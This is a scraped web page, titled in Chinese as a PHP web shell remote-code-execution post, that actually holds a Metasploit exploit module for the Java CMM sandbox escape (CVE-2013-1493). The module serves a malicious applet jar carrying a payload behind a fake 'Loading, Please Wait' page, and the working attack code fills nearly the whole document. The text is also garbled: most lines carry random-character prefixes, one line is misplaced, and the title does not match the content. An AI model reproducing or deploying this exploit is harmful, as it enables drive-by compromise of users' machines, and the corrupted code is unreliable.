STUNSHELL PHP Web Shell远程执行代码

admin

##
9 x8 a' q8 p3 \6 \4 j
# This file is part of the Metasploit Framework and may be subject to
+ [- F2 J5 ^; n7 r1 l# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
$ ?/ H, u8 q- u3 [3 E' h# http://metasploit.com/
% Y3 V1 ?  T( ~' C  K8 S) S8 s##
require ‘msf/core’
require ‘rex’
class Metasploit3 < Msf::Exploit::Remote
/ ?/ f) O. D4 B( [7 aRank = NormalRanking
: O( p1 o+ B- ^0 C0 |include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
. t% h& ^% Z& @/ u# e% w6 ~: o: ?include Msf::Exploit::Remote::BrowserAutopwn
' G  U" J3 ?% c) V* ~+ M( Q6 kautopwn_info({ :javascript => false })
def initialize( info = {} )
2 h! |9 x" y( ^+ K- f3 W, osuper( update_info( info,
- R* A* E# m! H1 J) M0 V* H‘Name’ => ‘Java CMM Remote Code Execution’,
4 z, J: ~- `: y3 [8 o‘Description’ => %q{
This module abuses the Color Management classes from a Java Applet to run
arbitrary Java code outside of the sandbox as exploited in the wild in February
* [1 b1 K: u( {( n( A$ I5 eand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
' C0 b2 @3 N  Z3 w. ~$ ~: Z7 \2 i1 Dand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java
warning in order to run the malicious applet.
},
‘License’ => MSF_LICENSE,
8 J* @: k9 H! Q2 [‘Author’ =>
'Unknown', # Vulnerability discovery and Exploit
'juan vazquez' # Metasploit module (just ported the published exploit)
$ N% l  ~* z5 \2 Y- K! x% M],
% L* c1 |8 S6 }- E# L% d‘References’ =>
+ n2 n6 y. w7 ?5 ]- H5 U[
: R3 O- H  X( |4 w5 M[ 'CVE', '2013-1493' ],
[ 'OSVDB', '90737' ],
[ 'BID', '58238' ],
1 |! O$ g* ?; l[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
9 X8 `9 N' O7 p# V[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
[ 'URL', 'http://pastie.org/pastes/6581034' ]
4 [" O" P. p5 q8 j8 ^],
‘Platform’ => [ 'win', 'java' ],
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
‘Targets’ =>
* ^, v0 e6 \! ]" A0 j. M' o[
[ 'Generic (Java Payload)',
( h. Q" n  @/ x! c2 b8 {9 C/ C2 }{
# P4 g5 u% ~% Q! y3 l- L1 h'Platform' => 'java',
4 \/ C# U3 Z* @- }) I: k'Arch' => ARCH_JAVA
! s0 ^) s+ c% T( i; Y}
) G3 [. C) r/ }. d. ?( U$ C* c],
% k! P  h0 r, U" U[ 'Windows x86 (Native Payload)',
/ |# M' H( J' c  Z$ j1 }{
'Platform' => 'win',
6 h! h& b! f) Q$ z'Arch' => ARCH_X86
) Y! X, c/ r$ Y9 A0 r7 l& x2 s}
0 m" B7 C  V. []
],
‘‘DisclosureDate’ => ‘Mar 01 2013′
))
8 _2 L5 A' A: u  D' r" L0 t9 V) send
/ L. o1 ^+ V& V# _+ n# r2 I2 j+ xdef setup
# V! e# D6 x+ C& Opath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
8 h+ u% j# v# c4 u9 |# x@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
. l8 q" o  L! U; e@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
4 [' @* ?' K9 F3 C@init_class_name = rand_text_alpha(“Init”.length)
* w6 i& U' p% X# d$ {9 [5 K@init_class.gsub!(“Init”, @init_class_name)
super
end
8 ^" i( _* b9 f" e" d/ J& Bdef on_request_uri(cli, request)
print_status(“handling request for #{request.uri}”)
case request.uri
% U( t" _5 _; l: a* Uwhen /\.jar$/i
) e6 i" X; V8 Qjar = payload.encoded_jar
+ D+ _2 U+ I8 \% Jjar.add_file(“#{@init_class_name}.class”, @init_class)
jar.add_file(“Leak.class”, @leak_class)
6 S! U( n2 t. E9 H  ^5 b5 _jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
jar.add_file(“MyColorSpace.class”, @color_space_class)
, Q) E. _- ]0 a8 C- \% r. f7 b, E( QDefaultTarget’ => 1,
metasploit_str = rand_text_alpha(“metasploit”.length)
7 I2 _  _2 x/ I7 t3 h0 w' E) Opayload_str = rand_text_alpha(“payload”.length)
jar.entries.each { |entry|
entry.name.gsub!(“metasploit”, metasploit_str)
, j" _/ X- i% b' F. Lentry.name.gsub!(“Payload”, payload_str)
entry.data = entry.data.gsub(“metasploit”, metasploit_str)
entry.data = entry.data.gsub(“Payload”, payload_str)
}
jar.build_manifest
$ S4 B+ C, {: m* z" osend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
when /\/$/
( U/ \5 K2 _( W$ @4 k* H$ }* u8 vpayload = regenerate_payload(cli)
if not payload
print_error(“Failed to generate the payload.”)
send_not_found(cli)
return
8 Q2 E* J( f2 n, `* {7 oend
; I( X* s! V; o/ L7 D! X& l( F1 ssend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
0 k9 L. \- @: m7 l& |else
. }/ r8 L1 P# U# m6 z8 I4 ]' H, Ssend_redirect(cli, get_resource() + ‘/’, ”)
end
end
def generate_html
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
# o# O' @. X- B9 i" R0 E2 ihtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
9 ~! ]; N8 _9 @5 N* R& @html += %Q|</applet></body></html>|
5 Q% [3 {2 Y6 }3 O9 i" i0 hreturn html
end
- C' ^* Z2 m, }4 F1 }0 |end
end
0 m" v! g1 k; z8 H( n( X: K